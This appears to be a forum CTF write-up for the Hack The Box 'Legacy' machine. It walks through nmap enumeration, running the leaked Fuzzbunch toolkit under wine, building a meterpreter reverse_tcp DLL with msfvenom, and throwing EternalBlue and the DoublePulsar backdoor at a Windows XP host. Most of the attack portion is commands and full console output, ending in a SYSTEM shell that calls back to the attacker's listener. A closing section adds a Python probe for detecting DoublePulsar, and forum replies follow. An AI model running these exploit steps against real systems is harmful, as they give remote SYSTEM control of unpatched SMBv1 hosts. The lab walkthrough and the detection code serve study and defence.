Legacy write-up by Alamot (using fuzzbunch)

Enumeration

Port scanning

> sudo nmap -A 10.10.10.4

Nmap scan report for 10.10.10.4
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Running (JUST GUESSING): Microsoft Windows 2000|XP|2003|PocketPC/CE (91%)
OS CPE: cpe:/o:microsoft:windows_2000 cpe:/o:microsoft:windows_xp 
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:aa:ea:dc (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Exploitation

Installing Fuzzbunch on Linux

  • Install wine and winetricks using the package manager of your linux distro.
  • Create a dedicated 32-bit wine prefix (you may need to install your distro's 32-bit packages)
> WINEPREFIX="$HOME/.wine-fuzzbunch" WINEARCH=win32 wine wineboot
  • Install python26 via winetricks
> WINEPREFIX="$HOME/.wine-fuzzbunch" winetricks python26
  • Get files from git
> cd $HOME/.wine-fuzzbunch/drive_c && git clone https://github.com/mdiazcl/fuzzbunch-debian
  • I have written a little script to run fuzzbunch:
> sudo nano /usr/local/bin/fuzzbunch 
    #!/bin/sh
    # Launch Fuzzbunch inside the 32-bit wine prefix created above
    export WINEPREFIX="$HOME/.wine-fuzzbunch"
    # fb.py is started from its own directory; python.exe lives two levels up in C:\Python26
    cd "$HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows" || exit 1
    wine ../../Python26/python.exe fb.py
> sudo chmod +x /usr/local/bin/fuzzbunch

Making the shellcode payload

DoublePulsar's RunDLL function injects a DLL into a user-mode process, so the payload has to be a DLL rather than raw shellcode. msfvenom can build one, or use anything else you like that produces a DLL:

> cd $HOME/.wine-fuzzbunch/drive_c/
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=[INSERT_YOUR_IP_HERE] LPORT=60000 -f dll -o shell.dll

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of dll file: 5120 bytes
Saved as: shell.dll

Setting up the listener

Again, you can use whatever listener you like. Here, I use the handler from metasploit:

> msfconsole
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST [INSERT_YOUR_IP_HERE]
msf exploit(handler) > set LPORT 60000
msf exploit(handler) > exploit -j
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on [INSERT_YOUR_IP_HERE]:60000

Running fuzzbunch

> fuzzbunch 

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\fuzzbunch-debian\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\fuzzbunch-debian\logs
[*] Autorun ON

[+] Set FbStorage => C:\fuzzbunch-debian\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 10.10.10.4
[?] Default Callback IP Address [] : [INSERT_YOUR_IP_HERE]     
[?] Use Redirection [yes] : no

[?] Base Log directory [C:\fuzzbunch-debian\logs] : 
[*] Checking C:\fuzzbunch-debian\logs for projects
Index     Project                 
-----     -------                 
0         Create a New Project    

[?] Project [0] : 0
[?] New Project Name : LEGACY
[?] Set target log directory to 'C:\fuzzbunch-debian\logs\legacy\z10.10.10.4'? [Yes] : 

[*] Initializing Global State
[+] Set TargetIp => 10.10.10.4
[+] Set CallbackIp => [INSERT_YOUR_IP_HERE]

[!] Redirection OFF
[+] Set LogDir => C:\fuzzbunch-debian\logs\legacy\z10.10.10.4
[+] Set Project => legacy

Running EternalBlue

fb > use EternalBlue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.10.10.4

[*] Applying Session Parameters
[*] Running Exploit Touches

[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

[?] Prompt For Variable Settings? [Yes] : y
[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] : 
[*]  TargetIp :: Target IP Address
[?] TargetIp [10.10.10.4] : 
[*]  TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] : 
[*]  VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.
[?] VerifyTarget [True] : 
[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] : 
[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.
[?] MaxExploitAttempts [3] : 
[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.
[?] GroomAllocations [12] : 
[*]  Target :: Operating System, Service Pack, and Architecture of target OS

*-> 0) XP            Windows XP 32-Bit All Service Packs
    1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 0
[+] Set Target => XP

[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

    0) DANE     Forward deployment via DARINGNEOPHYTE
*-> 1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] : y
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.10.10.4] : 
[?] Destination Port [445] : 
[+] (TCP) Local 10.10.10.4:445

[+] Configure Plugin Remote Tunnels

These are our final settings for EternalBlue:

Module: Eternalblue
===================

Name                  Value                                                 
----                  -----                                                 
DaveProxyPort         0                                                     
NetworkTimeout        60                                                    
TargetIp              10.10.10.4                                            
TargetPort            445                                                   
VerifyTarget          True                                                  
VerifyBackdoor        True                                                  
MaxExploitAttempts    3                                                     
GroomAllocations      12                                                    
ShellcodeBuffer                                                             
Target                XP                                                    

Now let’s execute it:

[?] Execute Plugin? [Yes] : y    
[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor not installed, game on.
[*] Forcing MaxExploitAttempts to 1.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (12 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 35 2e 31 00              Windows 5.1.
[*] Fingerprinting SMB non-paged pool quota
    [+] Allocation total: 0xfff4
    [+] Spray size: 0
    [+] Allocation total: 0x1ffe8
    [+] Spray size: 1
    [+] Allocation total: 0x2ffdc
    [+] Spray size: 2
    [+] Allocation total: 0x3ffd0
    [+] Spray size: 3
    [+] Allocation total: 0x4ffc4
    [+] Spray size: 4
    [+] Allocation total: 0x5ffb8
    [+] Spray size: 5
    [+] Allocation total: 0x6ffac
    [+] Spray size: 6
    [+] Allocation total: 0x7ffa0
    [+] Spray size: 7
    [+] Allocation total: 0x8ff94
    [+] Spray size: 8
    [+] Allocation total: 0x9ff88
    [+] Spray size: 9
    [+] Allocation total: 0xaff7c
    [+] Spray size: 10
    [+] Allocation total: 0xbff70
    [+] Spray size: 11
    [+] Quota NOT exceeded after 12 packets
    [+] Allocation total: 0xbff70
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
    ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
    [+] Sending 2 non-paged pool fragment packets
        ....DONE.
    [+] Sent 2 non-paged pool fragment packets ofsize 0x00006FF9
    [+] Sending 10 non-paged pool grooming packets
        ..........DONE.
    [+] Sent 10 non-paged pool grooming packets - groom complete
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
    DONE.
[*] Receiving response from exploit packet
    [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x86 (32-bit)
    [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

Running DoublePulsar

fb Special (Eternalblue) > use DoublePulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.10.10.4

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name              Value                                                 
----              -----                                                 
NetworkTimeout    60                                                    
TargetIp          10.10.10.4                                            
TargetPort        445                                                   
OutputFile                                                              
Protocol          SMB                                                   
Architecture      x86                                                   
Function          OutputInstall                                         

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] : 
[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1 for no timeout.
[?] NetworkTimeout [60] : 
[*]  TargetIp :: Target IP Address
[?] TargetIp [10.10.10.4] : 
[*]  TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] : 
[*]  Protocol :: Protocol for the backdoor to speak

*-> 0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] : 
[*]  Architecture :: Architecture of the target OS

*-> 0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] : 
[*]  Function :: Operation for backdoor to perform

    0) OutputInstall     Only output the install shellcode to a binary file on disk.
    1) Ping              Test for presence of backdoor
*-> 2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [0] : 2
[+] Set Function => RunDLL
[*]  DllPayload :: DLL to inject into user mode
[?] DllPayload [] : 
[*]  DllPayload :: DLL to inject into user mode
[?] DllPayload [] : C:\shell.dll
[+] Set DllPayload => C:\shell.dll
[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] : 
[*]  ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] : svchost.exe    
[+] Set ProcessName => svchost.exe
[*]  ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] : 

[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [10.10.10.4] : 
[?] Destination Port [445] : 
[+] (TCP) Local 10.10.10.4:445

[+] Configure Plugin Remote Tunnels

These are our final settings for DoublePulsar:

Module: Doublepulsar
====================

Name                  Value                                                 
----                  -----                                                 
NetworkTimeout        60                                                    
TargetIp              10.10.10.4                                            
TargetPort            445                                                   
DllPayload            C:\shell.dll                                          
DllOrdinal            1                                                     
ProcessName           svchost.exe                                           
ProcessCommandLine                                                          
Protocol              SMB                                                   
Architecture          x86                                                   
Function              RunDLL

It's important to change the ProcessName from lsass.exe to svchost.exe. lsass.exe is a critical system process: if the injected DLL crashes it, Windows forces a reboot and takes the freshly installed backdoor with it, whereas a crashed svchost.exe instance is survivable. The payload runs with the token of whichever process it lands in; the getuid below shows it still comes back as SYSTEM.

[?] Execute Plugin? [Yes] : 
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
	[+] Backdoor returned code: 10 - Success!
	[+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x00811F87
    SMB Connection string is: Windows 5.1
    Target OS is: XP x86
	[+] Backdoor installed
	[+] DLL built
	[.] Sending shellcode to inject DLL
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Backdoor returned code: 10 - Success!
	[+] Command completed successfully
[+] Doublepulsar Succeeded

Back to metasploit:

[*] Sending stage (179267 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM :D
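The two things Fuzzbunch verifies before and after the throw (VerifyTarget reads the SMB native-OS string, "Windows 5.1" for XP; VerifyBackdoor and the "Pinging backdoor" lines send the DoublePulsar ping) can be reproduced with a small standalone probe, which is also how defenders sweep a network for the implant after an incident like this. The following is an added example written for this page, not code from the original post or from Fuzzbunch. It builds a null SMB1 session (allowed here, as nmap's smb-security-mode shows), reads the native-OS string from the Session Setup reply, then sends the TRANS2 SESSION_SETUP request that the implant hooks. A clean host answers with the request's Multiplex ID (0x41); an infected host answers with MID 0x51. The opcode encoding in the Timeout field (low three bytes summing to the opcode, 0x23 for ping) is taken from public analyses of the leaked tool; 0x00A4D9A6 is the value the public probes use. All function, constant and sample names are mine; the two sample replies are constructed, not captured, and the live `probe()` path was not run against a host here.

```python
import random
import socket
import struct
import sys

SMB_COM_TRANSACTION2 = 0x32
SMB_COM_NEGOTIATE = 0x72
SMB_COM_SESSION_SETUP_ANDX = 0x73
SMB_COM_TREE_CONNECT_ANDX = 0x75
TRANS2_SESSION_SETUP = 0x000E     # Trans2 subcommand the implant hooks
DOUBLEPULSAR_PING = 0x23          # opcode carried in the Trans2 Timeout field
PID_LOW = 0xFEFF
MID_PROBE = 0x41                  # clean hosts echo this MID back ...
MID_BACKDOOR = 0x51               # ... the implant answers with this one


def netbios(smb):
    """Wrap an SMB message in a NetBIOS session header (type 0, 3-byte length)."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def smb_header(command, tid=0, uid=0, mid=MID_PROBE, status=0):
    """32-byte SMB1 header: flags2 = Unicode | NT status | long names, no signing."""
    return struct.pack("<4sBIBHH8sHHHHH", b"\xffSMB", command, status, 0x18, 0xC001,
                       0, b"\x00" * 8, 0, tid, PID_LOW, uid, mid)


def parse_header(reply):
    """Return (command, nt_status, tid, uid, mid) of a NetBIOS-wrapped SMB1 reply."""
    if len(reply) < 36 or reply[4:8] != b"\xffSMB":
        raise ValueError("not an SMB1 message")
    cmd, status, _f, _f2, _ph, _sig, _r, tid, _pid, uid, mid = struct.unpack(
        "<BIBHH8sHHHHH", reply[8:36])
    return cmd, status, tid, uid, mid


def negotiate_request():
    dialects = b"\x02NT LM 0.12\x00"
    return netbios(smb_header(SMB_COM_NEGOTIATE) + b"\x00"
                   + struct.pack("<H", len(dialects)) + dialects)


def session_setup_request():
    """Anonymous session, legacy 13-word form: 1-byte OEM password, empty account/domain."""
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 4356, 10, 0, 0, 1, 0, 0, 0xD4)
    data = (b"\x00" + b"\x00\x00" + b"\x00\x00"
            + "Windows 2000 2195\x00".encode("utf-16-le")
            + "Windows 2000 5.0\x00".encode("utf-16-le"))
    return netbios(smb_header(SMB_COM_SESSION_SETUP_ANDX) + b"\x0d" + words
                   + struct.pack("<H", len(data)) + data)


def tree_connect_request(host, uid):
    data = b"\x00" + f"\\\\{host}\\IPC$\x00".encode("utf-16-le") + b"?????\x00"
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0x0008, 1)
    return netbios(smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid) + b"\x04" + words
                   + struct.pack("<H", len(data)) + data)


def encode_timeout(opcode, seed):
    """The implant reads its opcode from Timeout: the three low bytes must sum to
    the opcode mod 256; everything else is noise. seed supplies bytes 1 and 2."""
    b1, b2 = seed & 0xFF, (seed >> 8) & 0xFF
    return ((opcode - b1 - b2) & 0xFF) | (b1 << 8) | (b2 << 16)


def trans2_ping_request(tid, uid, timeout):
    """TRANS2 SESSION_SETUP with 12 zero parameter bytes (ParameterOffset 66)."""
    words = struct.pack("<HHHHBBHIHHHHHBBH", 12, 0, 1, 0, 0, 0, 0, timeout,
                        0, 12, 66, 0, 78, 1, 0, TRANS2_SESSION_SETUP)
    data = b"\x00" + b"\x00" * 12                  # 1 pad byte, then the parameters
    return netbios(smb_header(SMB_COM_TRANSACTION2, tid=tid, uid=uid) + b"\x0f" + words
                   + struct.pack("<H", len(data)) + data)


def native_os(reply):
    """NativeOS string from a Session Setup AndX reply ('Windows 5.1' on XP)."""
    cmd, status, _, _, _ = parse_header(reply)
    if cmd != SMB_COM_SESSION_SETUP_ANDX or status != 0:
        raise ValueError(f"session setup failed, NT status 0x{status:08X}")
    off = 37 + 2 * reply[36] + 2                   # skip WordCount, words, ByteCount
    off += (off - 4) % 2                           # UTF-16 strings are 2-byte aligned from SMB start
    end = off
    while end + 2 <= len(reply) and reply[end:end + 2] != b"\x00\x00":
        end += 2
    return reply[off:end].decode("utf-16-le")


def classify(reply):
    cmd, status, _, _, mid = parse_header(reply)
    if cmd != SMB_COM_TRANSACTION2:
        return "unexpected reply"
    return "DoublePulsar present" if mid == MID_BACKDOOR else f"clean (NT status 0x{status:08X})"


def _recv(sock):
    def exact(n):
        buf = b""
        while len(buf) < n:
            chunk = sock.recv(n - len(buf))
            if not chunk:
                raise ConnectionError("connection closed")
            buf += chunk
        return buf
    head = exact(4)
    return head + exact(int.from_bytes(head[1:4], "big"))


def probe(host, port=445):
    """Live check: returns (native_os_string, verdict). Needs SMBv1 and null sessions."""
    with socket.create_connection((host, port), timeout=10) as s:
        s.sendall(negotiate_request())
        if parse_header(_recv(s))[1] != 0:
            raise RuntimeError("SMB1 negotiate rejected (SMBv1 disabled?)")
        s.sendall(session_setup_request())
        r = _recv(s)
        os_string, uid = native_os(r), parse_header(r)[3]
        s.sendall(tree_connect_request(host, uid))
        r = _recv(s)
        if parse_header(r)[1] != 0:
            raise RuntimeError("IPC$ tree connect failed")
        timeout = encode_timeout(DOUBLEPULSAR_PING, random.getrandbits(16))
        s.sendall(trans2_ping_request(parse_header(r)[2], uid, timeout))
        return os_string, classify(_recv(s))


def sample_session_reply(os_name="Windows 5.1"):
    """Constructed (not captured) Session Setup reply laid out like XP's 3-word form."""
    strings = "".join(s + "\x00" for s in (os_name, "Windows 2000 LAN Manager", "HTB"))
    data = b"\x00" + strings.encode("utf-16-le")    # pad byte, then NativeOS/LanMan/Domain
    return netbios(smb_header(SMB_COM_SESSION_SETUP_ANDX, uid=0x0800) + b"\x03"
                   + struct.pack("<BBHH", 0xFF, 0, 0, 1) + struct.pack("<H", len(data)) + data)


def sample_ping_reply(mid, status=0):
    """Constructed TRANS2 reply with no words and no data, only the header matters."""
    return netbios(smb_header(SMB_COM_TRANSACTION2, tid=0x0800, uid=0x0800, mid=mid,
                              status=status) + b"\x00" + b"\x00\x00")


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))
    else:   # offline demo on the constructed samples
        print(native_os(sample_session_reply()), classify(sample_ping_reply(MID_BACKDOOR)))
```

Run it as `python3 dp_probe.py 10.10.10.4` before the throw (expect "Windows 5.1" and a clean verdict, matching "Backdoor not installed, game on") and again afterwards (expect "DoublePulsar present", matching "Backdoor installed"). The same Trans2 request is what the public nmap and Metasploit checks send, so a detection rule for it on port 445 will also catch the tool's own pings; the probe deliberately does not compute the per-host XOR key that Fuzzbunch prints, since presence is all a sweep needs.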

Very neat, haven't used fuzzbunch before. Will have to give this a go. Thanks for the share.

very cool :+1:

Awesome! Keep it up :slight_smile: